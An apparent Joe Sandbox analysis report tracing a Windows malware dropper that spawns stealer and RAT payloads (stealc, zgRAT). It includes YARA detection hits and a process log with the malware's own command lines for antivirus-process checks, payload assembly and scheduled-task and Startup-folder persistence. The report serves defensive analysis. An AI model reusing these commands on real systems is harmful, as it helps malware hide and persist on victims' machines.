Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_001B8720	6_2_001B8720
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_001B777B	6_2_001B777B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_001B2BD0	6_2_001B2BD0
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Code function: 7_2_01550B3A	7_2_01550B3A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00E1DC74	9_2_00E1DC74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_063CA688	9_2_063CA688
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_063C67D8	9_2_063C67D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_063C3F50	9_2_063C3F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_063C3750	9_2_063C3750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_063C6FF8	9_2_063C6FF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_063C6FE8	9_2_063C6FE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0666EF40	9_2_0666EF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0666C588	9_2_0666C588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_06660A0C	9_2_06660A0C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_06661EF1	9_2_06661EF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_06661F00	9_2_06661F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_066A8E01	9_2_066A8E01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_066A8760	9_2_066A8760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_066A6790	9_2_066A6790
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_066AF580	9_2_066AF580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_066A9AF0	9_2_066A9AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_066AA358	9_2_066AA358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_066ADB59	9_2_066ADB59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_066A13C0	9_2_066A13C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_066A7060	9_2_066A7060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_066AE8F8	9_2_066AE8F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_066AC0C8	9_2_066AC0C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_066AB100	9_2_066AB100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_066AA998	9_2_066AA998
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_066A6448	9_2_066A6448
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_066AA348	9_2_066AA348
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_066A13B0	9_2_066A13B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_066AE8E8	9_2_066AE8E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_066AA989	9_2_066AA989
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00402310	12_2_00402310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004050B0	12_2_004050B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0042045E	12_2_0042045E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0040FCE0	12_2_0040FCE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00419D09	12_2_00419D09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0041950B	12_2_0041950B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00415625	12_2_00415625
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00404EF0	12_2_00404EF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0040CF7F	12_2_0040CF7F
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Code function: 13_2_00AF7712	13_2_00AF7712
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Code function: 13_2_00AF7468	13_2_00AF7468
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Code function: 13_2_00AF7458	13_2_00AF7458
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Code function: 13_2_00AF7762	13_2_00AF7762
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Code function: 13_2_08360578	13_2_08360578
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Code function: 13_2_0836F533	13_2_0836F533
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Code function: 13_2_08360568	13_2_08360568
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Code function: 15_2_0177DC74	15_2_0177DC74
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Code function: 15_2_055D6948	15_2_055D6948
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Code function: 15_2_055D7C20	15_2_055D7C20
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Code function: 15_2_055D0040	15_2_055D0040
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Code function: 15_2_055D0006	15_2_055D0006
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Code function: 15_2_055D7C10	15_2_055D7C10
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Code function: 15_2_067E67D0	15_2_067E67D0
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Code function: 15_2_067EA3E8	15_2_067EA3E8
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Code function: 15_2_067E3F50	15_2_067E3F50
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Code function: 15_2_067EA3B7	15_2_067EA3B7
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Code function: 15_2_067E6FF8	15_2_067E6FF8
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Code function: 15_2_067E6FE8	15_2_067E6FE8

Source: Joe Sandbox View	Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View	Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A

Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe

Process token adjusted: Security

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: String function: 00407D20 appears 55 times

Source: BitcoinCore[1].exe.6.dr	Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: BitcoinCore.exe.6.dr	Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)

Source: BitcoinCore[1].exe.6.dr	Static PE information: Number of sections : 11 > 10
Source: BitcoinCore.exe.6.dr	Static PE information: Number of sections : 11 > 10

Source: OmnqazpM3P.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 12.2.RegAsm.exe.482060.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 13.0.pLAZbVgk7u.exe.1c0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 12.2.RegAsm.exe.482060.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 00000015.00000002.2975464614.0000000001C7C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 00000018.00000002.3370673324.0000000001B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 00000015.00000002.2975464614.0000000001B4C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe, type: DROPPED	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT

Source: crypted[1].exe.6.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: crypted.exe.6.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: crypteda[1].exe.6.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: crypteda.exe.6.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: OmnqazpM3P.exe	Static PE information: Section: ZLIB complexity 0.9975200102179836
Source: OmnqazpM3P.exe	Static PE information: Section: ogvicfhk ZLIB complexity 0.9941623852002409
Source: axplong.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9975200102179836
Source: axplong.exe.0.dr	Static PE information: Section: ogvicfhk ZLIB complexity 0.9941623852002409

Source: classification engine

Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@76/90@10/13

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\crypted[1].exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2860:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6452:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Mutant created: \Sessions\1\BaseNamedObjects\07c6bc37dc50874878dcb010336ed906
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2952:120:WilError_03
Source: C:\Users\user\1000238002\Amadeus.exe	Mutant created: \Sessions\1\BaseNamedObjects\c1ec479e5342a25940592acf24703eb2
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6428:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5012:120:WilError_03

Source: C:\Users\user\Desktop\OmnqazpM3P.exe

File created: C:\Users\user\AppData\Local\Temp\44111dbc49

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe

Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Honda Honda.bat & Honda.bat & exit

Source: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\OmnqazpM3P.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\OmnqazpM3P.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: stealc_default2.exe, 00000014.00000002.3059535907.000000006C3FF000.00000002.00000001.01000000.00000019.sdmp, stealc_default2.exe, 00000014.00000002.3058821249.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000014.00000002.3044641940.000000001B9C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: stealc_default2.exe, 00000014.00000002.3059535907.000000006C3FF000.00000002.00000001.01000000.00000019.sdmp, stealc_default2.exe, 00000014.00000002.3058821249.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000014.00000002.3044641940.000000001B9C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: stealc_default2.exe, 00000014.00000002.3059535907.000000006C3FF000.00000002.00000001.01000000.00000019.sdmp, stealc_default2.exe, 00000014.00000002.3058821249.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000014.00000002.3044641940.000000001B9C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: stealc_default2.exe, 00000014.00000002.3059535907.000000006C3FF000.00000002.00000001.01000000.00000019.sdmp, stealc_default2.exe, 00000014.00000002.3058821249.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000014.00000002.3044641940.000000001B9C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: stealc_default2.exe, 00000014.00000002.3059535907.000000006C3FF000.00000002.00000001.01000000.00000019.sdmp, stealc_default2.exe, 00000014.00000002.3058821249.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000014.00000002.3044641940.000000001B9C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: stealc_default2.exe, 00000014.00000002.3059535907.000000006C3FF000.00000002.00000001.01000000.00000019.sdmp, stealc_default2.exe, 00000014.00000002.3058821249.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000014.00000002.3044641940.000000001B9C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: stealc_default2.exe, 00000014.00000002.3058821249.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000014.00000002.3044641940.000000001B9C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: 6rxotqIg7H.exe, 0000000F.00000002.2867303710.00000000033EF000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003346000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.000000000346C000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.00000000033D9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003482000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.000000000335C000.00000004.00000800.00020000.00000000.sdmp, stealc_default2.exe, 00000014.00000003.2907041222.0000000021A7D000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000014.00000003.2893019260.0000000001713000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000014.00000003.2896484635.0000000021A89000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: stealc_default2.exe, 00000014.00000002.3058821249.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000014.00000002.3044641940.000000001B9C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: stealc_default2.exe, 00000014.00000002.3058821249.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000014.00000002.3044641940.000000001B9C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: OmnqazpM3P.exe	Virustotal: Detection: 58%
Source: OmnqazpM3P.exe	ReversingLabs: Detection: 65%

Source: OmnqazpM3P.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\OmnqazpM3P.exe

File read: C:\Users\user\Desktop\OmnqazpM3P.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\OmnqazpM3P.exe "C:\Users\user\Desktop\OmnqazpM3P.exe"
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Process created: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe "C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe"
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Process created: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe "C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe"
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe "C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe"
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe "C:\Users\user\AppData\Roaming\6rxotqIg7H.exe"
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Process created: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe "C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Process created: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe "C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Process created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe "C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe"
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Process created: C:\Users\user\AppData\Local\Temp\1000129001\caesium-image-compressor.exe "C:\Users\user\AppData\Local\Temp\1000129001\caesium-image-compressor.exe"
Source: C:\Users\user\AppData\Local\Temp\1000129001\caesium-image-compressor.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Process created: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe "C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe"
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Process created: C:\Users\user\AppData\Local\Temp\1000228001\PureSyncInst.exe "C:\Users\user\AppData\Local\Temp\1000228001\PureSyncInst.exe"
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Process created: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe "C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe"
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Honda Honda.bat & Honda.bat & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 591950
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "BachelorRayPotentialBeats" Itsa
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Competent + ..\Screw + ..\Whom + ..\Reveal + ..\Provides + ..\Still + ..\Entrepreneurs + ..\Greatest + ..\Corporate + ..\Wireless E
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif Shipment.pif E
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Process created: C:\Users\user\1000238002\Amadeus.exe "C:\Users\user\1000238002\Amadeus.exe"
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url" & echo URL="C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js"
Source: C:\Users\user\AppData\Local\Temp\1000228001\PureSyncInst.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
Source: unknown	Process created: C:\Users\user\1000238002\Amadeus.exe "C:\Users\user\1000238002\Amadeus.exe"
Source: C:\Users\user\1000238002\Amadeus.exe	Process created: C:\Users\user\AppData\Local\Temp\1000262001\385107.exe "C:\Users\user\AppData\Local\Temp\1000262001\385107.exe"
Source: C:\Users\user\AppData\Local\Temp\1000262001\385107.exe	Process created: C:\Users\user\AppData\Local\Temp\7zSC5C3.tmp\Install.exe .\Install.exe
